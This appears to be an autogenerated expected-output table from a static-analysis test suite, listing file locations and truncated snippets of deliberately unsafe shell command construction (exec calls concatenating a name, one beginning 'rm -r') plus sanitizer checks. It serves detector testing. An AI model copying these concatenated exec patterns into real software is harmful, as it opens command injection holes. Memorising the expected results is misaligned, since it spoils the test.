| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:3:43:33 | cp.exec ... Source) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:28 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:51 | require ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:2:55:14 | cp.exec(cmd1) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:3:59:14 | cp.exec(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:2:65:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:2:67:14 | cp.exec(name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:2:69:48 | cp.exec ... a end") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:2:71:32 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:2:73:32 | cp.exec ... + "\\"") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:2:75:30 | cp.exec ... + "'") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:2:77:38 | cp.exec ... + "'") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:2:79:29 | cp.exec ... file") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:2:83:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:2:86:17 | args1.push(name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:2:87:25 | cp.exec ... n(" ")) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:24 | args1.join(" ") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:2:89:36 | cp.exec ... n(" ")) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:35 | ["rm -r ... in(" ") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:2:91:50 | cp.exec ... n(" ")) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:49 | ["rm -r ... in(" ") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:2:93:33 | cp.exec ... name]) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:12:96:26 | require("util") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:2:98:40 | cp.exec ... name)) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:39 | util.fo ... , name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:2:100:42 | cp.exec ... name)) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:41 | util.fo ... , name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:2:102:51 | cp.exec ... name)) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:50 | util.fo ... , name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:2:104:41 | cp.exec ... name)) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:40 | util.fo ... , name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:2:106:57 | cp.exec ... name)) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:56 | util.fo ... , name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:2:108:46 | cp.exec ... name)) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:26 | require("printf") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:45 | require ... , name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:2:112:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:114:7:114:23 | isValidName(name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:2:117:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:2:121:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:123:7:123:22 | isSafeName(name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:2:126:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:3:131:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:3:135:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:3:138:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:2:144:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:2:152:23 | cp.spaw ... gs, cb) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:2:159:23 | cp.spaw ... gs, cb) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:2:167:2 | cp.spaw ... t' }\\n\\t) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:30 | ['/C', ... (args2) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:2:171:27 | cp.exec ... ommand) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:2:173:24 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:24:178:50 | name.re ... '\\\\''") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:2:179:31 | cp.exec ... itized) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:21:181:46 | name.re ... "'\\''") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:2:182:28 | cp.exec ... broken) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:12:185:26 | require("path") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:2:187:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:7:189:22 | path.exist(name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:3:190:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:2:193:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:2:197:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:6:199:36 | /[^A-Za ... t(name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:3:200:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:3:202:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:2:207:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:6:209:37 | /^[A-Za ... t(name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:3:210:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:3:212:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:2:217:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:7:219:37 | /^([a-z ... t(name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:3:220:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:3:221:18 | process.exit(-1) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:2:224:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:2:228:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:3:231:23 | path.ac ... c(name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:2:236:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:6:240:33 | /[^A-Za ... test(s) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:13:241:36 | s.repla ... '\\\\''") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:242:32 | s.repla ... /g, '') |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:243:28 | s.repla ... "\\\\'") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:2:249:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:2:253:29 | cp.exec ... leaned) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:10:256:22 | require("fs") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:2:258:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:7:260:37 | fs.exis ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:3:261:34 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:2:264:33 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:2:268:33 | cp.exec ... ersion) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:2:272:33 | cp.exec ... ersion) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:3:277:31 | cp.exec ... ts.bla) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:3:281:36 | cp.exec ... ts.bla) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:287:12:287:35 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:288:12:288:35 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:289:12:289:36 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:290:12:290:36 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:291:12:291:36 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:292:12:292:36 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:293:12:293:36 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:294:12:294:36 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:295:12:295:35 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:296:12:296:35 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:297:12:297:35 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:298:12:298:36 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:299:12:299:36 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:300:12:300:36 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:301:12:301:35 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:302:12:302:36 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:303:12:303:36 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:308:3:308:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:311:3:311:32 | cp.exec ... itized) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:315:2:315:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:318:3:318:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:320:3:320:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:326:2:326:13 | cp.exec(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:336:2:336:32 | cp.exec ... test")) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:340:2:340:27 | cp.exec ... id(n)) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:345:3:345:24 | cp.exec ... " + n) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:350:2:350:26 | cp.exec ... + safe) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:351:2:351:28 | cp.exec ... unsafe) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:354:1:358:2 | Object. ... ;\\n\\t}\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:356:10:356:40 | boundPr ... "safe") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:367:3:367:18 | cp.exec(command) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:2:406:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:2:409:31 | cp.exec ... itized) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:12:412:35 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:2:415:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:2:417:66 | cp.exec ... => {}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:2:418:45 | cp.spaw ... true}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:2:419:52 | cp.exec ... true}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:2:420:49 | cp.spaw ... true}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:2:424:40 | spawn(" ... WN_OPT) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:2:426:15 | arr.push(name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:2:427:28 | spawn(" ... WN_OPT) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:2:428:70 | spawn(" ... WN_OPT) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:6:433:16 | something() |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:3:434:21 | arr.push('convert') |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:11:435:25 | arr.push(first) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:10:436:23 | arr.push(last) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:17:440:40 | require ... ecute") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:2:442:28 | asyncEx ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:3:447:29 | asyncEx ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:453:1:470:1 | Object. ... \\t)\\n\\t)\\n) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:455:2:469:2 | Object. ... \\n\\t\\t)\\n\\t) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:457:25 | Object. ... yFuncs) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:468:3 | Object. ... \\t{}\\n\\t\\t) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:31:466:4 | Object. ... },\\n\\t\\t\\t) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:14:472:28 | require('path') |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:21:473:35 | require('util') |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:14:475:53 | promisi ... ).exec) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:24:475:47 | require ... ocess') |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:17:478:62 | path.jo ... ry -v') |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:479:12:479:20 | exec(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:2:485:20 | cp.exec(cmd + args) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:2:490:13 | cp.exec(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:7:495:30 | require ... ocess') |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:35 | MyThing ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:11:504:33 | require ... orted') |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:2:510:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:512:6:512:16 | isNaN(name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:3:513:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:3:515:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:6:518:26 | isNaN(p ... (name)) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:12:518:25 | parseInt(name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:3:519:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:3:521:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:524:6:524:17 | isNaN(+name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:3:525:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:3:527:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:6:530:30 | isNaN(p ... e, 10)) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:12:530:29 | parseInt(name, 10) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:3:531:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:3:533:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:6:536:20 | isNaN(name - 0) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:3:537:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:3:539:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:6:542:20 | isNaN(name \| 0) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:3:543:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:3:545:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:10:1:33 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:2:4:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:10:1:33 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:5:4:29 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:10:1:33 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:2:4:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:10:1:33 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:2:4:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:8:2:23 | require("./bla") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:9:3:27 | require("./subsub") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:12:1:35 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:2:4:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:1:6:2 | define( ... };\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:13:4:31 | require("./amdSub") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:12:1:35 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:2:4:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:10:1:33 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:2:4:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:2:8:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:22:11:40 | require("./amd.js") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:5:14:40 | cp.spaw ... true}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:15:1:32 | require('express') |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:21:2:44 | require ... ocess') |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:7:10:7:22 | require('fs') |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:8:11:8:19 | express() |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:1:10:43 | exec("c ... ut) {}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:1:14:2 | exec("c ... ut);\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:2:13:17 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:1:16:29 | execSyn ... uinfo') |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:1:16:40 | execSyn ... tring() |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:18:1:18:26 | execSyn ... path}`) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:20:1:20:36 | execSyn ... wc -l') |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:1:22:38 | execSyn ... o/bar') |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:1:22:49 | execSyn ... tring() |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:1:24:35 | execSyn ... o/bar`) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:1:24:46 | execSyn ... tring() |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:1:26:58 | exec(`c ... t) { }) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:1:28:39 | execSyn ... 1000}) |
